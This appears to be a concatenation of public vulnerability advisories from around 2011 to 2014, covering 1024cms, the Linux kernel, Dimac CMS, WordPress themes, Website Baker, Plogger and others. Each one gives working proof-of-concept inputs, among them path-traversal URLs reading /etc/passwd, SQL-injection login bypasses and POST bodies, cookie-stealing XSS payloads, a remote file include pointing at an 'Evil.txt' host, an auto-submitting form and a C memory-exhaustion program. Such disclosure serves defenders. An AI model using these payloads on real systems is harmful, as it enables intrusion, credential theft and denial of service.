source: https://www.securityfocus.com/bid/47282/info 1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information. 1024cms 1.1.0 beta is vulnerable; other versions may also be affected. http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00 http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd http://www.example.com/index.php?act=../../../../../../etc/passwd%00 http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00 http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

/* source: https://www.securityfocus.com/bid/47296/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. */ #include <sys/inotify.h> #include <unistd.h> int main(int argc, char *argv[]) { int fds[2]; /* Circumvent max inotify instances limit */ while (pipe(fds) != -1) ; while (1) inotify_init(); return 0; }

source: https://www.securityfocus.com/bid/47291/info Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Dimac CMS XS 1.3 is vulnerable; other versions may also be affected. The following example URI and data are available: http://www.example.com/[path]/CMSadmin/default.asp Username : admin Password : 1'or'1'='1

source: https://www.securityfocus.com/bid/47298/info Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Etki Video Pro 2.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/izle.asp?id=254 [SQL Injection]

source: https://www.securityfocus.com/bid/47298/info Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Etki Video Pro 2.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection]

source: https://www.securityfocus.com/bid/47299/info Live Wire for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability. Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible. Live Wire for Wordpress 2.3.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=jpg http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1

source: https://www.securityfocus.com/bid/47309/info eForum is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. eForum 1.1 is vulnerable; other versions may also be affected. if (isset($_FILES)) { //upload attachments ...snip... $invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess'); $uploaddir = $eforum->path.'/upload'; $upfiles = $_FILES['efattachment']; foreach ($upfiles['name'] as $idx => $upname) { if ($upname != '') { $source = $upfiles['tmp_name'][$idx]; if (is_uploaded_file($source)) { if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) { continue; }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Exploit Title: Lazarus Guestbook 1.22 Multiple Persistent Cross-Site Scripting - Sql Injection Vulnerability # Date: 23/12/2014 # Url Vendor: http://carbonize.co.uk/Lazarus/ # Vendor Name: Lazarus # Version: 1.22 # CVE: CVE-2014-2239 # Author: TaurusOmar # Tiwtter: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Tested On: Bugtraq Optimus # Risk: High #Description Lazarus is a free guestbook script written in PHP that uses your MySQL database for storage and is based upon the excellent Advanced Guestbook script from Proxy2. I took the Advanced Guestbook and added more features and several layers of anti spam protection to make one of the most feature rich and spam resistant guestbook scripts available for free. I am always active on the forums and you can rest assured that if the spammers find a way past the current anti spam methods that I have others waiting in the wings. You can read my own guestbook to see what other people have had to say about Lazarus and my anti spam fixes for Advanced Guestbook. --------------------------------- + MULTIPLE CROSS SITE SCRIPTING + --------------------------------- #Exploiting Description - Multiple Cross Site Scripting in multiple boxes in plataform #P0c [1]: Get into code xss in the ad block box <textarea class="input" id="ad_code" name="ad_code" wrap="virtual" rows="14" cols="41">CODE XSS&lt;/textarea&gt; #P0c [2]: Get into code xss in the smile name box <input type="text" size="25" value="CODE XSS" name="s_emotion"> #P0c [3]: Get into code xss in the font style box <input type="text" class="input" maxlength="70" size="38" value="CODE XSS" name="font_face"> #P0c [4]: Get into code xss in the security box <input type="text" class="input" value="CODE XSS" size="29" name="comment_pass"> #P0c [5]: Get into code xss in the email notification box <input type="text" class="input" maxlength="60" size="30" value="CODE XSS" name="book_mail"> #P0c [6]: Get into code xss in the tags box <input type="text" class="input" maxlength="60" size="30" value="CODE XSS" name="allowed_tags"> #Proof Concept http://i.imgur.com/sczND0w.jpg http://i.imgur.com/SNMFRCV.jpg http://i.imgur.com/OR2RTc1.jpg http://i.imgur.com/xNX6Ln0.jpg http://i.imgur.com/dlqSpLM.jpg http://i.imgur.com/JESZTCz.jpg ------------------------ + SQL INJECTION + ------------------------ # Exploiting Description - Sql Injection in control panel of admin and others users. #P0c http://site.com/lazarus/admin.php?action=settings&panel=general&gbsession="RANDOM_TOKEN"&uid=[sql] #Proof Concept http://i.imgur.com/36JamRc.jpg

source: https://www.securityfocus.com/bid/47310/info MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'. An attacker may exploit this issue to execute arbitrary code with superuser privileges. Failed attempts will cause the affected application to crash, denying service to legitimate users. A successful exploit will completely compromise affected computers. MIT Kerberos 5 1.7 and later are vulnerable. NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue. # nmap -n -sV krb01

source: https://www.securityfocus.com/bid/47317/info The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible. Spellchecker 3.1 is vulnerable; other versions may also be affected. The following example URIs are available: http://www.example.com/general.php?file=http://sitename.com/Evil.txt? http://www.example.com/general.php?file=../../../../../../../etc/passwd

source: https://www.securityfocus.com/bid/47320/info The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability. Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible. Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable. http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1

source: https://www.securityfocus.com/bid/47332/info Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Website Baker 2.8.1 is vulnerable; other versions may also be affected. POST /admin/users/add.php HTTP/1.1 user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add POST /admin/groups/add.php HTTP/1.1 advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add

source: https://www.securityfocus.com/bid/47329/info Plogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Plogger 1.0 Rc1 is vulnerable; other versions may also be affected. <form action="http://host/plog-admin/plog-options.php" method="post"> <input type="hidden" name="gallery_name" value='my gallery"><script>alert(document.cookie)</script>'> <input type="hidden" name="gallery_url" value="http://host/"> <input type="hidden" name="admin_username" value="Ildar"> <input type="hidden" name="admin_email" value="valeevildar@ya.ru"> <input type="hidden" name="admin_password" value=""> <input type="hidden" name="confirm_admin_password" value=""> <input type="submit" id="btn" name="submit" value="Update Options"> </form> <script> document.getElementById('btn').click(); </script>